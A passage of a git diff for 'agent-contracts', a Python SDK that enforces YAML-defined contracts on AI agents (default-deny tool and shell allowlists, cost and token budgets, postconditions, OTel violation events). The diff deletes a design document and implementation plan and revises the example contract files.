**Define a YAML spec** (AGENT_CONTRACT.yaml) with 3 graduated tiers (Standalone → Enforceable → Composable) -2. **Ship a Python SDK** (`agent-contracts`) that validates contracts, enforces budgets/effects at runtime, and emits OTel-compatible violation events -3. **Ship a CLI** for validation, compatibility checking, contract generation from traces, and eval testing -4. **Ship framework adapters** for LangChain, CrewAI, and Pydantic AI (each <200 LOC, 3-line integration) -5. **Draft MCP extension proposal** (`x-agent-contract`) for tool-level contract metadata - -## Non-Goals - -1. **Not a protocol** — MCP owns transport; we layer policy above it -2. **Not a platform** — no hosted service, no vendor lock-in -3. **Not formal verification** — no theorem proving; executable assertions at Levels 2–3 -4. **No custom DSL** — YAML primary, CEL-like expressions for inline checks only -5. **No TypeScript SDK** in v0.1 (deferred to v0.1.x, 4–6 weeks post-launch) -6. **No contract registry** — premature infrastructure at zero adoption -7. **No inter-agent negotiation** — requires ecosystem maturity -8. **No taint tracking** — novel; deferred to v0.2 - ---- - -## Design - -### Option A: Monolithic SDK (Single Package, Everything Built-in) - -**Approach:** Single `agent-contracts` package containing spec schema, loader, validator, -enforcer, CLI, OTel emitter, composition checker, and all framework adapters. - -**Trade-offs:** -- Pro: Single install, single import, simpler dependency management -- Con: Pulls in framework deps (langchain, crewai, pydanticai) even if unused; bloated install - -**Complexity:** ~3000 LOC, 1 package, heavy deps - -### Option B: Modular Core + Optional Extras (Recommended) - -**Approach:** Core package (`agent-contracts`) with zero required framework deps. -Framework adapters as optional extras (`pip install agent-contracts[langchain]`). -CLI bundled in core. OTel as optional extra. 
- -**Trade-offs:** -- Pro: Minimal install footprint; framework deps only when needed; clean separation of concerns -- Pro: Each module testable independently; easier to maintain -- Con: Slightly more complex packaging (extras_require) - -**Complexity:** ~3500 LOC, 1 package with extras, minimal required deps (pyyaml, jsonschema) - -### Recommendation - -**Option B** — Modular Core + Optional Extras. Matches the plan's "standalone value first" strategy. -A developer gets `pip install agent-contracts` with zero framework baggage. Framework adapters -are opt-in. This mirrors how OpenTelemetry structures its packages. - ---- - -## Detailed Design - -### Package Structure - -``` -agent-contracts/ -├── pyproject.toml # Package config (hatch build system) -├── LICENSE # Apache-2.0 -├── README.md # Getting started, 5-minute contract -├── AGENT_CONTRACT.yaml # Reference example (support triage agent) -├── src/ -│ └── agent_contracts/ -│ ├── __init__.py # Public API surface -│ ├── py.typed # PEP 561 marker -│ ├── types.py # Core data models (dataclasses) -│ ├── schema.py # JSON Schema definitions (all 3 tiers) -│ ├── loader.py # YAML loading + schema validation -│ ├── tier.py # Tier assessment logic -│ ├── enforcer.py # Runtime enforcement (budgets, effects, schemas) -│ ├── effects.py # Effect authorization (default-deny allowlist) -│ ├── budgets.py # Budget tracking (cost, tokens, tool calls, duration) -│ ├── postconditions.py # Postcondition evaluation (sync/async/monitor) -│ ├── violations.py # Violation event creation + OTel emission -│ ├── composition.py # Contract Differential (schema/capability/budget gaps) -│ ├── cli.py # CLI entry point (click-based) -│ ├── init_from_trace.py # Generate contract skeleton from traces -│ ├── _version.py # Version constant -│ └── adapters/ -│ ├── __init__.py -│ ├── langchain.py # LangChain adapter (<200 LOC) -│ ├── crewai.py # CrewAI adapter (<200 LOC) -│ └── pydantic_ai.py # Pydantic AI adapter (<200 LOC) -├── schemas/ -│ └── 
agent-contract.schema.json # The JSON Schema (machine-readable spec) -├── spec/ -│ └── SPECIFICATION.md # Human-readable spec narrative -├── mcp/ -│ └── x-agent-contract.md # MCP extension proposal -├── examples/ -│ ├── support_triage.yaml # Tier 2 reference example -│ ├── simple_chatbot.yaml # Tier 0 minimal example -│ └── cost_controlled.yaml # Tier 1 budget-focused example -└── tests/ - ├── __init__.py - ├── conftest.py # Shared fixtures - ├── test_loader.py # Contract loading + validation - ├── test_tier.py # Tier assessment - ├── test_enforcer.py # Runtime enforcement - ├── test_effects.py # Effect authorization - ├── test_budgets.py # Budget tracking - ├── test_postconditions.py # Postcondition evaluation - ├── test_violations.py # Violation events - ├── test_composition.py # Contract Differential - ├── test_cli.py # CLI commands - ├── test_init_from_trace.py # Trace-based generation - └── test_adapters/ - ├── test_langchain.py - ├── test_crewai.py - └── test_pydantic_ai.py -``` - -### Core Data Models (`types.py`) - -```python -@dataclass(frozen=True) -class ContractIdentity: - name: str - version: str - -@dataclass(frozen=True) -class PostconditionDef: - name: str - check: str # CEL-like expression or "eval:judge" reference - enforcement: Literal["sync_block", "sync_warn", "async_monitor"] - severity: Literal["critical", "major", "minor"] - slo: SLODef | None = None - -@dataclass(frozen=True) -class EffectsAuthorized: - tools: list[str] # Allowlist (default: deny all) - network: list[str] # URL patterns - state_writes: list[str] # State scope patterns - -@dataclass(frozen=True) -class EffectsDeclared: - tools: list[str] # Actual effect footprint - network: list[str] - state_writes: list[str] - -@dataclass(frozen=True) -class ResourceBudgets: - max_cost_usd: float | None - max_tokens: int | None - max_tool_calls: int | None - max_duration_seconds: float | None - -@dataclass(frozen=True) -class Contract: - spec_version: str - identity: ContractIdentity - 
postconditions: list[PostconditionDef] - tier: int # Computed: 0, 1, or 2 - # Tier 1 - input_schema: dict | None - output_schema: dict | None - effects_authorized: EffectsAuthorized | None - budgets: ResourceBudgets | None - # Tier 2 - failure_model: dict | None - effects_declared: EffectsDeclared | None - delegation: DelegationRules | None - observability: ObservabilityConfig | None - versioning: VersioningConfig | None - slo: SLOConfig | None -``` - -### Enforcement Flow (`enforcer.py`) - -``` -Agent invocation - │ - ├─ PRE: validate input against input_schema (Tier 1) - │ - ├─ DURING: intercept each tool call - │ ├─ Check tool name against effects.authorized.tools (default: DENY) - │ ├─ Increment tool_call counter → check against max_tool_calls - │ ├─ Accumulate cost → check against max_cost_usd - │ ├─ Check elapsed time → check against max_duration_seconds - │ └─ On violation → emit OTel event, circuit-break or warn - │ - ├─ POST: validate output against output_schema (Tier 1) - │ ├─ Evaluate sync_block postconditions → block if failed - │ ├─ Evaluate sync_warn postconditions → warn if failed - │ └─ Queue async_monitor postconditions → evaluate async - │ - └─ EMIT: violation events (OTel-compatible) -``` - -Three usage patterns: -1. **Decorator:** `@enforce_contract("path/to/contract.yaml")` -2. **Context Manager:** `with ContractEnforcer(contract) as enforcer:` -3. 
**Explicit API:** `enforcer.check_tool_call(name, args)`, `enforcer.validate_output(data)` - -### Effect Authorization (`effects.py`) - -- **Default-deny:** If `effects.authorized.tools` is defined, only listed tools are allowed -- **Pattern matching:** Supports glob patterns (`database.*`, `api.user.*`) -- **Composition:** During delegation, authorized effects compose via **intersection** (capabilities attenuate) -- **Audit:** Declared effects compose via **union** (footprint accumulates) -- Runtime enforces: `declared ⊆ authorized` - -### Budget Enforcement (`budgets.py`) - -- Per-invocation counters: cost, tokens, tool_calls, elapsed time -- Thread-safe (uses threading.Lock for counter updates) -- Circuit breaker: when threshold hit, raises `BudgetExceededError` -- Cost tracking: accepts cost callbacks from the caller (we don't hardcode model prices) - -### Violation Events (`violations.py`) - -OTel-compatible structured events: -```python -@dataclass -class ViolationEvent: - contract_id: str - contract_version: str - violated_clause: str # e.g., "budgets.max_cost_usd" - evidence: dict # e.g., {"actual": 5.23, "limit": 5.00} - severity: str # "critical", "major", "minor" - enforcement: str # "blocked", "warned", "monitored" - trace_id: str | None - span_id: str | None - timestamp: str # ISO 8601 -``` - -Emitters: stdout (default), OTel SDK (when `opentelemetry-api` installed), callback. - -### Composition Checker (`composition.py`) - -Contract Differential between two Tier 2 contracts: -- **Schema gaps:** Input schema A not assignable to output schema B -- **Capability gaps:** A requires tools not authorized by B -- **Budget gaps:** A's budget exceeds B's budget -- **Effect validation:** A's declared effects not ⊆ B's authorized effects -- Returns structured report with compatibility verdict - -### CLI (`cli.py`) - -Built on `click`. 
Four commands: -- `validate`: Load contract, validate schema, report tier, recommend missing fields -- `check-compat`: Run composition checker between two contracts -- `init`: Generate contract skeleton from execution trace JSONL -- `test`: Run eval suite against contract postconditions - ---- - -## Security & Privacy Considerations - -- [x] **Default-deny effects** — tools not in allowlist are blocked before execution -- [x] **No prompt-level enforcement** — all enforcement at SDK layer (not bypassable via injection) -- [x] **Budget circuit breakers** — prevent cost runaway architecturally -- [x] **No secrets in contracts** — contracts are declarative policy, no credentials -- [x] **Input validation** — all YAML input validated against JSON Schema before processing -- [x] **No eval()** — CEL-like expressions parsed by a safe evaluator, never `eval()` -- [x] **Thread-safe counters** — budget enforcement is concurrency-safe -- [x] **Immutable data models** — `frozen=True` dataclasses prevent mutation after construction - ---- - -## Testing Strategy - -### Unit Tests -- Loader: valid/invalid YAML, schema validation errors, partial contracts -- Tier: correct tier classification for all combinations of fields -- Enforcer: tool call interception, budget tracking, input/output validation -- Effects: allowlist matching, glob patterns, default-deny, composition (intersection/union) -- Budgets: counter increments, threshold detection, thread safety -- Postconditions: sync_block/sync_warn/async_monitor evaluation -- Violations: event creation, OTel formatting, callback emission -- Composition: schema compatibility, capability gaps, budget gaps - -### Integration Tests -- Full enforcement flow: load contract → enforce agent invocation → collect violations -- CLI commands: validate, check-compat, init from sample traces -- Framework adapters: integration with mocked LangChain/CrewAI/Pydantic AI hooks - -### Test Coverage Target -- 90%+ line coverage on core modules (loader, 
enforcer, effects, budgets) -- 80%+ on adapters and CLI - ---- - -## Monitoring & Observability - -- **Built-in:** Violation events are the core observability primitive -- **OTel integration:** Events conform to OpenTelemetry semantic conventions -- **Metrics:** contract_satisfaction_rate, budget_utilization, effect_violations_total -- N/A for self-monitoring — this is the monitoring SDK, not a monitored service - ---- - -## Rollback Plan - -- [x] Change is revertable with `git revert` (all commits on feature branch) -- [x] No data migrations -- [x] Not applicable (new repo, no production deployment) -- [x] Rollback: `pip uninstall agent-contracts` - ---- - -## Dependencies & Risks - -### Required Dependencies (minimal) -- `pyyaml>=6.0` — YAML parsing -- `jsonschema>=4.20` — JSON Schema validation -- `click>=8.0` — CLI framework - -### Optional Dependencies -- `opentelemetry-api>=1.20` — OTel event emission -- `langchain-core>=0.2` — LangChain adapter -- `crewai>=0.50` — CrewAI adapter -- `pydantic-ai>=0.1` — Pydantic AI adapter - -### Risks -- **Adoption stalls at Tier 0** (medium) — mitigated by CLI nudges toward Tier 1 -- **CEL expression parser complexity** — mitigated by starting with simple comparisons only -- **Framework adapter API changes** — mitigated by pinning minimum versions, thin wrappers - ---- - -## Approval - -- [ ] Design reviewed by quality reviewer -- [ ] Design reviewed by cross-reviewer (DADS, Complex tier) -- [ ] Security considerations reviewed -- [ ] Testing strategy adequate for risk level diff --git a/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md b/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md deleted file mode 100644 index 8617d75..0000000 --- a/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md +++ /dev/null @@ -1,165 +0,0 @@ -# Agent Contracts v0.1 — Implementation Plan - -## Goal -Build the Agent Contracts v0.1 project: YAML spec + Python SDK + CLI + framework adapters + MCP extension proposal. 
- -## Approach -Sequential implementation starting with the spec/schema foundation, then core SDK modules (bottom-up by dependency), CLI, adapters, and finally documentation/examples. Each task is independently committable and revertable. - -## File Inventory - -| File | Action | Task | -|------|--------|------| -| `pyproject.toml` | CREATE | T1 | -| `LICENSE` | CREATE | T1 | -| `src/agent_contracts/__init__.py` | CREATE | T1 | -| `src/agent_contracts/py.typed` | CREATE | T1 | -| `src/agent_contracts/_version.py` | CREATE | T1 | -| `schemas/agent-contract.schema.json` | CREATE | T2 | -| `src/agent_contracts/types.py` | CREATE | T3 | -| `src/agent_contracts/schema.py` | CREATE | T3 | -| `src/agent_contracts/loader.py` | CREATE | T4 | -| `src/agent_contracts/tier.py` | CREATE | T4 | -| `src/agent_contracts/effects.py` | CREATE | T5 | -| `src/agent_contracts/budgets.py` | CREATE | T5 | -| `src/agent_contracts/postconditions.py` | CREATE | T6 | -| `src/agent_contracts/violations.py` | CREATE | T6 | -| `src/agent_contracts/enforcer.py` | CREATE | T7 | -| `src/agent_contracts/composition.py` | CREATE | T8 | -| `src/agent_contracts/init_from_trace.py` | CREATE | T9 | -| `src/agent_contracts/cli.py` | CREATE | T9 | -| `src/agent_contracts/adapters/__init__.py` | CREATE | T10 | -| `src/agent_contracts/adapters/langchain.py` | CREATE | T10 | -| `src/agent_contracts/adapters/crewai.py` | CREATE | T10 | -| `src/agent_contracts/adapters/pydantic_ai.py` | CREATE | T10 | -| `examples/support_triage.yaml` | CREATE | T11 | -| `examples/simple_chatbot.yaml` | CREATE | T11 | -| `examples/cost_controlled.yaml` | CREATE | T11 | -| `AGENT_CONTRACT.yaml` | CREATE | T11 | -| `spec/SPECIFICATION.md` | CREATE | T12 | -| `mcp/x-agent-contract.md` | CREATE | T12 | -| `tests/conftest.py` | CREATE | T4 | -| `tests/test_loader.py` | CREATE | T4 | -| `tests/test_tier.py` | CREATE | T4 | -| `tests/test_effects.py` | CREATE | T5 | -| `tests/test_budgets.py` | CREATE | T5 | -| 
`tests/test_postconditions.py` | CREATE | T6 | -| `tests/test_violations.py` | CREATE | T6 | -| `tests/test_enforcer.py` | CREATE | T7 | -| `tests/test_composition.py` | CREATE | T8 | -| `tests/test_cli.py` | CREATE | T9 | -| `tests/test_init_from_trace.py` | CREATE | T9 | -| `tests/test_adapters/test_langchain.py` | CREATE | T10 | -| `tests/test_adapters/test_crewai.py` | CREATE | T10 | -| `tests/test_adapters/test_pydantic_ai.py` | CREATE | T10 | -| `README.md` | MODIFY | T13 | -| `.gitignore` | CREATE | T1 | -| `CLAUDE.md` | CREATE | T13 | - ---- - -## Tasks - -### T1: Project scaffolding and package configuration -- **What:** Create pyproject.toml (hatch build), LICENSE (Apache-2.0), .gitignore, package __init__.py, py.typed marker, _version.py -- **Files:** pyproject.toml, LICENSE, .gitignore, src/agent_contracts/__init__.py, src/agent_contracts/py.typed, src/agent_contracts/_version.py -- **LOC estimate:** ~120 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m pip install -e ".[dev]" && python -c "import agent_contracts; print(agent_contracts.__version__)"` -- **Commit:** `build(project): scaffold package with pyproject.toml and Apache-2.0 license` -- **Rollback:** `git revert ` - -### T2: JSON Schema for AGENT_CONTRACT.yaml (all 3 tiers) -- **What:** Create the formal JSON Schema that defines the AGENT_CONTRACT.yaml format. Covers Tier 0 (identity + postconditions), Tier 1 (+ schemas, effects.authorized, budgets), Tier 2 (+ failure_model, effects.declared, delegation, observability, versioning, slo). Supports x- extensions and must-ignore unknown fields. 
-- **Files:** schemas/agent-contract.schema.json -- **LOC estimate:** ~280 -- **Verify:** `python -c "import json; s=json.load(open('schemas/agent-contract.schema.json')); print(s['title'])"` -- **Commit:** `feat(spec): add JSON Schema for AGENT_CONTRACT.yaml covering all 3 tiers` -- **Rollback:** `git revert ` - -### T3: Core data models and schema module -- **What:** Define frozen dataclasses for Contract, ContractIdentity, PostconditionDef, EffectsAuthorized, EffectsDeclared, ResourceBudgets, DelegationRules, ObservabilityConfig, VersioningConfig, SLOConfig, SLODef. Schema module loads and exposes the JSON Schema. -- **Files:** src/agent_contracts/types.py, src/agent_contracts/schema.py -- **LOC estimate:** ~250 -- **Verify:** `python -c "from agent_contracts.types import Contract, ResourceBudgets; print('OK')"` -- **Commit:** `feat(core): add typed data models and schema module` -- **Rollback:** `git revert ` - -### T4: Contract loader, tier assessor, and tests -- **What:** YAML loading with schema validation, tier assessment (classify as 0/1/2 based on fields present), recommendation engine for missing fields. Shared test fixtures. Tests for loader and tier. -- **Files:** src/agent_contracts/loader.py, src/agent_contracts/tier.py, tests/conftest.py, tests/test_loader.py, tests/test_tier.py -- **LOC estimate:** ~300 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m pytest tests/test_loader.py tests/test_tier.py -v` -- **Commit:** `feat(core): add contract loader with schema validation and tier assessment` -- **Rollback:** `git revert ` - -### T5: Effect authorization and budget enforcement with tests -- **What:** Default-deny effect gating with glob pattern matching. Budget tracker with thread-safe counters, circuit breaker on threshold. Tests for both. 
-- **Files:** src/agent_contracts/effects.py, src/agent_contracts/budgets.py, tests/test_effects.py, tests/test_budgets.py -- **LOC estimate:** ~280 -- **Verify:** `python -m pytest tests/test_effects.py tests/test_budgets.py -v` -- **Commit:** `feat(core): add effect authorization (default-deny) and budget enforcement` -- **Rollback:** `git revert ` - -### T6: Postcondition evaluation and violation events with tests -- **What:** Postcondition evaluator supporting sync_block/sync_warn/async_monitor enforcement timing. Safe expression evaluator for CEL-like checks (no eval()). Violation event model (OTel-compatible). Event emitters: stdout, callback, optional OTel SDK. Tests. -- **Files:** src/agent_contracts/postconditions.py, src/agent_contracts/violations.py, tests/test_postconditions.py, tests/test_violations.py -- **LOC estimate:** ~280 -- **Verify:** `python -m pytest tests/test_postconditions.py tests/test_violations.py -v` -- **Commit:** `feat(core): add postcondition evaluation and OTel-compatible violation events` -- **Rollback:** `git revert ` - -### T7: Runtime enforcer (middleware) with tests -- **What:** ContractEnforcer class that wires together effects, budgets, postconditions, and violations into a unified enforcement flow. Supports decorator, context manager, and explicit API. Pre-call input validation, per-tool-call interception, post-call output validation. -- **Files:** src/agent_contracts/enforcer.py, tests/test_enforcer.py -- **LOC estimate:** ~250 -- **Verify:** `python -m pytest tests/test_enforcer.py -v` -- **Commit:** `feat(core): add runtime enforcer with decorator, context manager, and explicit API` -- **Rollback:** `git revert ` - -### T8: Composition checker (Contract Differential) with tests -- **What:** Given two Tier 2 contracts, compute schema gaps, capability gaps, budget gaps, effect validation (declared ⊆ authorized). Returns structured compatibility report. 
-- **Files:** src/agent_contracts/composition.py, tests/test_composition.py -- **LOC estimate:** ~200 -- **Verify:** `python -m pytest tests/test_composition.py -v` -- **Commit:** `feat(core): add composition checker with Contract Differential analysis` -- **Rollback:** `git revert ` - -### T9: CLI tool and trace-based init with tests -- **What:** Click-based CLI with 4 commands: validate, check-compat, init (from-trace), test. Trace parser reads JSONL execution traces and generates contract skeleton. Tests. -- **Files:** src/agent_contracts/cli.py, src/agent_contracts/init_from_trace.py, tests/test_cli.py, tests/test_init_from_trace.py -- **LOC estimate:** ~300 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m agent_contracts.cli validate examples/support_triage.yaml` (after T11) -- **Commit:** `feat(cli): add validate, check-compat, init, and test commands` -- **Rollback:** `git revert ` - -### T10: Framework adapters (LangChain, CrewAI, Pydantic AI) with tests -- **What:** Thin adapter wrappers (<200 LOC each) that map framework-specific hooks to the SDK's enforcement API. Each adapter enables 3-line contract enforcement integration. Tests with mocked framework interfaces. -- **Files:** src/agent_contracts/adapters/__init__.py, src/agent_contracts/adapters/langchain.py, src/agent_contracts/adapters/crewai.py, src/agent_contracts/adapters/pydantic_ai.py, tests/test_adapters/test_langchain.py, tests/test_adapters/test_crewai.py, tests/test_adapters/test_pydantic_ai.py -- **LOC estimate:** ~300 (adapters) + ~200 (tests) -- **Verify:** `python -m pytest tests/test_adapters/ -v` -- **Commit:** `feat(adapters): add LangChain, CrewAI, and Pydantic AI framework adapters` -- **Rollback:** `git revert ` - -### T11: Reference examples and root contract -- **What:** Create example AGENT_CONTRACT.yaml files: support_triage (Tier 2, full), simple_chatbot (Tier 0, minimal), cost_controlled (Tier 1, budget-focused). 
Root AGENT_CONTRACT.yaml as the canonical reference. All must pass schema validation. -- **Files:** AGENT_CONTRACT.yaml, examples/support_triage.yaml, examples/simple_chatbot.yaml, examples/cost_controlled.yaml -- **LOC estimate:** ~200 -- **Verify:** `python -m agent_contracts.cli validate AGENT_CONTRACT.yaml && python -m agent_contracts.cli validate examples/support_triage.yaml` -- **Commit:** `docs(examples): add reference AGENT_CONTRACT.yaml files for all 3 tiers` -- **Rollback:** `git revert ` - -### T12: Specification narrative and MCP extension proposal -- **What:** Human-readable spec document explaining each field, the tier system, breaking change rules, and CEL expression syntax. MCP extension proposal for x-agent-contract on tool definitions. -- **Files:** spec/SPECIFICATION.md, mcp/x-agent-contract.md -- **LOC estimate:** ~250 -- **Verify:** Manual review — documents should be complete and accurate -- **Commit:** `docs(spec): add human-readable specification and MCP extension proposal` -- **Rollback:** `git revert ` - -### T13: README, CLAUDE.md, and public API surface -- **What:** Getting-started README with 5-minute contract experience, quick examples, API reference. CLAUDE.md for repo conventions. Polish __init__.py public exports. -- **Files:** README.md, CLAUDE.md, src/agent_contracts/__init__.py -- **LOC estimate:** ~200 -- **Verify:** `python -c "from agent_contracts import Contract, ContractEnforcer, load_contract, validate_contract; print('Public API OK')"` -- **Commit:** `docs(readme): add getting-started guide and CLAUDE.md conventions` -- **Rollback:** `git revert ` diff --git a/examples/cost_controlled.yaml b/examples/cost_controlled.yaml index 65b1868..7fc438a 100644 --- a/examples/cost_controlled.yaml +++ b/examples/cost_controlled.yaml @@ -1,13 +1,12 @@ # Tier 1 — Enforceable Contract -# Adds cost control, tool-use security, and input/output validation. -# The SDK can enforce these at the boundary. 
+# Adds cost control plus coding/build shell and file scopes. agent_contract: "0.1.0" identity: name: cost-controlled-researcher - version: "1.2.0" - description: A research agent with strict cost and tool-use controls. + version: "0.1.0" + description: Research helper with strict spend and execution controls. contract: postconditions: @@ -20,21 +19,15 @@ contract: check: "len(output.sources) > 0" enforcement: sync_warn severity: major - description: Research output should include at least one source. inputs: schema: type: object - required: - - query + required: [query] properties: query: type: string minLength: 1 - max_results: - type: integer - minimum: 1 - maximum: 50 outputs: schema: @@ -46,25 +39,22 @@ outputs: type: array items: type: string - confidence: - type: number - minimum: 0 - maximum: 1 effects: authorized: - tools: - - web_search - - document_reader - - summarizer - network: - - "https://api.search-provider.com/*" - - "https://docs.example.com/*" + tools: [web_search, document_reader, summarizer] + network: ["https://api.search-provider.com/*", "https://docs.example.com/*"] state_writes: [] + filesystem: + read: ["docs/**", "README.md"] + write: ["notes/**"] + shell: + commands: ["python -m pytest *"] resources: budgets: max_cost_usd: 0.50 max_tokens: 15000 max_tool_calls: 10 + max_shell_commands: 2 max_duration_seconds: 60.0 diff --git a/examples/demo_blocked_command.yaml b/examples/demo_blocked_command.yaml new file mode 100644 index 0000000..9a3025a --- /dev/null +++ b/examples/demo_blocked_command.yaml @@ -0,0 +1,29 @@ +agent_contract: "0.1.0" + +identity: + name: blocked-command-demo + version: "0.1.0" + +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + +effects: + authorized: + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] + +resources: + budgets: + max_shell_commands: 3 + +observability: 
+ run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/demo_blocked_file_write.yaml b/examples/demo_blocked_file_write.yaml new file mode 100644 index 0000000..285f5c2 --- /dev/null +++ b/examples/demo_blocked_file_write.yaml @@ -0,0 +1,24 @@ +agent_contract: "0.1.0" + +identity: + name: blocked-file-write-demo + version: "0.1.0" + +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + +effects: + authorized: + filesystem: + read: ["src/**", "tests/**"] + write: ["src/**"] + tools: [] + network: [] + state_writes: [] + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/demo_failed_checks.yaml b/examples/demo_failed_checks.yaml new file mode 100644 index 0000000..350fee9 --- /dev/null +++ b/examples/demo_failed_checks.yaml @@ -0,0 +1,15 @@ +agent_contract: "0.1.0" + +identity: + name: failed-checks-demo + version: "0.1.0" + +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/repo_build_agent.yaml b/examples/repo_build_agent.yaml new file mode 100644 index 0000000..9f33554 --- /dev/null +++ b/examples/repo_build_agent.yaml @@ -0,0 +1,41 @@ +agent_contract: "0.1.0" + +identity: + name: repo-build-agent + version: "0.1.0" + description: Repo-local coding/build agent with bounded file and shell scope. 
+ +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical + +effects: + authorized: + filesystem: + read: ["src/**", "tests/**", "README.md", "pyproject.toml"] + write: ["src/**", "tests/**", "README.md"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] + +resources: + budgets: + max_tokens: 50000 + max_tool_calls: 20 + max_shell_commands: 10 + max_duration_seconds: 1800 + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/simple_chatbot.yaml b/examples/simple_chatbot.yaml index ee46077..ed114d2 100644 --- a/examples/simple_chatbot.yaml +++ b/examples/simple_chatbot.yaml @@ -1,13 +1,11 @@ # Tier 0 — Minimal Valid Contract -# A developer gets value from writing this even if nothing else reads it. -# 4 fields. Adopt in 5 minutes. No runtime required. agent_contract: "0.1.0" identity: name: simple-chatbot - version: "1.0.0" - description: A basic conversational chatbot with a single quality guarantee. + version: "0.1.0" + description: Basic chatbot with one non-null response guarantee. contract: postconditions: @@ -15,4 +13,3 @@ contract: check: "output is not None" enforcement: sync_block severity: critical - description: The chatbot must always produce a non-null response. diff --git a/examples/support_triage.yaml b/examples/support_triage.yaml index 7ba7fdd..56597a7 100644 --- a/examples/support_triage.yaml +++ b/examples/support_triage.yaml @@ -1,16 +1,11 @@ -# Tier 2 — Composable Contract (Full Reference Example) -# Supports multi-agent DAG composition, canary analysis, rollback, -# and regulatory audit trails. 
+# Tier 2 — Composable Contract (retained broader example) agent_contract: "0.1.0" identity: name: support-triage-agent - version: "2.1.0" - description: > - Triages incoming support tickets by analyzing content, classifying - priority, and routing to the appropriate team. Handles 500+ tickets/day - with 99.5% contract satisfaction. + version: "0.1.0" + description: Triages incoming support tickets with explicit safety and audit hooks. authors: - Piyush Vyas @@ -20,39 +15,24 @@ contract: check: "output is not None" enforcement: sync_block severity: critical - description: Must always produce a triage result. - name: valid_priority check: 'output.priority in ["critical", "high", "medium", "low"]' enforcement: sync_block severity: critical - description: Priority must be one of the defined levels. - name: has_routing check: 'output.routed_to is not None' enforcement: sync_warn severity: major - description: Should route to a team (warn if not). slo: target_rate: 0.99 window: "24h" - - name: response_quality - check: "eval:quality_judge" - enforcement: async_monitor - severity: minor - description: LLM-as-judge quality assessment (async, not blocking). - slo: - target_rate: 0.95 - window: "7d" - inputs: schema: type: object - required: - - ticket_id - - subject - - body + required: [ticket_id, subject, body] properties: ticket_id: type: string @@ -60,31 +40,22 @@ inputs: type: string body: type: string - customer_tier: - type: string - enum: ["enterprise", "business", "starter", "free"] - attachments: - type: array - items: - type: object - properties: - filename: - type: string - url: - type: string preconditions: - name: ticket_not_empty check: "len(input.body) > 0" - description: Ticket body must not be empty. 
outputs: schema: type: object - required: - - priority - - category + required: [priority, category] properties: + ticket_id: + type: string + subject: + type: string + body: + type: string priority: type: string enum: ["critical", "high", "medium", "low"] @@ -92,14 +63,6 @@ outputs: type: string routed_to: type: string - summary: - type: string - suggested_response: - type: string - confidence: - type: number - minimum: 0 - maximum: 1 effects: authorized: @@ -109,7 +72,6 @@ effects: - ticket_database.assign - customer_lookup - knowledge_base.search - - notification.send_team network: - "https://api.ticketing.internal/*" - "https://api.customers.internal/*" @@ -143,77 +105,15 @@ failure_model: errors: - name: ticket_not_found retryable: false - description: The referenced ticket does not exist. - - name: database_timeout retryable: true max_retries: 3 - description: Ticket database took too long to respond. - - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - description: API rate limit exceeded, queue for later processing. - - - name: classification_uncertain - retryable: false - fallback: human-review-queue - description: Agent confidence too low for automated triage. - - default_timeout_seconds: 20.0 - - circuit_breaker: - failure_threshold: 10 - reset_timeout_seconds: 120.0 - -delegation: - max_depth: 2 - attenuate_effects: true - require_contract: true - allowed_agents: - - queue-agent - - human-review-queue - - notification-agent observability: traces: enabled: true sample_rate: 1.0 - - metrics: - - name: triage_latency_ms - type: histogram - description: End-to-end triage latency. - - name: triage_total - type: counter - description: Total tickets triaged. - - name: priority_distribution - type: gauge - description: Current distribution of ticket priorities. 
- violation_events: emit: true destination: otel - -versioning: - build_id: "sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" - breaking_changes: [] - substitution: - compatible_with: - - "2.0.0" - -slo: - contract_satisfaction_rate: - target: 0.995 - window: "24h" - - latency: - p50_ms: 800 - p99_ms: 5000 - - cost: - avg_usd: 0.04 - p99_usd: 0.10 - - error_budget_policy: freeze_deployments + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/pyproject.toml b/pyproject.toml index d54a0ed..38534a5 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -5,7 +5,7 @@ build-backend = "hatchling.build" [project] name = "aicontracts" dynamic = ["version"] -description = "YAML spec + validation SDK for production agent reliability — cost control, tool-use security, and audit trails." +description = "Repo-local, fail-closed guardrails for autonomous coding/build agents." readme = "README.md" license = "Apache-2.0" requires-python = ">=3.9" @@ -25,9 +25,8 @@ classifiers = [ "Typing :: Typed", ] keywords = [ - "agent", "contracts", "llm", "safety", "validation", "mcp", - "ai-agents", "guardrails", "governance", "compliance", "observability", - "opentelemetry", "budget", "cost-control", "tool-use", "audit", + "agent", "contracts", "coding-agent", "build-agent", "guardrails", "repo-local", + "fail-closed", "budgets", "tool-use", "filesystem", "shell", "ci", ] dependencies = [ "pyyaml>=6.0", @@ -96,3 +95,15 @@ python_version = "3.9" strict = true warn_return_any = true warn_unused_configs = true + +[[tool.mypy.overrides]] +module = [ + "yaml", + "jsonschema", + "jsonschema.*", + "opentelemetry", + "opentelemetry.*", + "openai_agents", + "langchain_core.*", +] +ignore_missing_imports = true diff --git a/schemas/agent-contract.schema.json b/schemas/agent-contract.schema.json index ef8667e..6ee5748 100644 